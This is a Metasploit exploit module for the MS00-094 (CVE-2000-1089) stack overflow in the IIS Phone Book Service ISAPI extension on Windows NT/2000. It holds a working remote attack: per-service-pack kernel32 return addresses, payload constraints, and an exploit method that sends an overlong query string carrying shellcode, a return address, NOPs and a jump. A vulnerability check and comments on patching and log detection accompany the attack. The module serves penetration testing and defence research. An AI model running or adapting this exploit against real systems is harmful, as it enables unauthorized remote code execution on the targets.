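##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the stack overflow in the IIS Phone Book Service ISAPI
# extension (pbserver.dll) described in MS00-094 / CVE-2000-1089.
#
# Risk context for reviewers: the affected component ships with legacy
# Windows NT/2000 IIS installs; the vendor fix is the MS00-094 update, and
# removing the pbserver.dll mapping from IIS eliminates the exposed surface.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata (name, references, payload constraints,
  # return addresses per target) and the single URL option.
  #
  # @param info [Hash] metadata merged by Msf before +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS00-094 Microsoft IIS Phone Book Service Overflow',
        'Description' => %q{
          This is an exploit for the Phone Book Service /pbserver/pbserver.dll
          described in MS00-094. By sending an overly long URL argument
          for phone book updates, it is possible to overwrite the stack. This
          module has only been tested against Windows 2000 SP1.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2000-1089' ],
          [ 'OSVDB', '463' ],
          [ 'BID', '2048' ],
          [ 'MSB', 'MS00-094' ],
        ],
        'Privileged' => false,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 896,
          # The payload travels inside the query string, so bytes that end or
          # reshape a URL (NUL, CR, LF, space, %, &, =, ?) are excluded.
          'BadChars' => "\x00\x0a\x0d\x20%&=?",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # Return addresses are fixed kernel32.dll offsets for each listed
        # service-pack level; the module has only been tested against target 0.
        'Targets' => [
          ['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll
          ['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll
          ['Windows NT SP6', { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll
        ],
        'DisclosureDate' => '2000-12-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),
      ]
    )
  end

  # Probes the configured URL with a plain request (5 s timeout).
  #
  # An HTTP 400 reply is treated as evidence that the pbserver.dll ISAPI
  # extension answered and is reported as Detected. Any other reply is
  # reported as Safe. No reply at all (timeout, refused connection) says
  # nothing about the patch state and is reported as Unknown, so an
  # unreachable host is not mis-reported as not vulnerable.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    print_status("Requesting the vulnerable ISAPI path...")
    res = send_request_raw({
      'uri' => normalize_uri(datastore['URL'])
    }, 5)

    # Distinguish "no answer" from "answered with something other than 400".
    return Exploit::CheckCode::Unknown unless res
    return Exploit::CheckCode::Detected if res.code == 400

    Exploit::CheckCode::Safe
  end

  # Sends the single request carrying the overflow in the query string and
  # then starts the payload handler.
  #
  # Detection note for defenders: the request is an unusually long GET to the
  # pbserver.dll path whose query string begins with `?&&&&&&pb=`; IIS logs
  # and a WAF length limit on that path both surface it.
  def exploit
    print_status("Sending overflow...")

    res = send_request_raw({
      'uri' => normalize_uri(datastore['URL']) + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
    }, 5)

    handler
  end
end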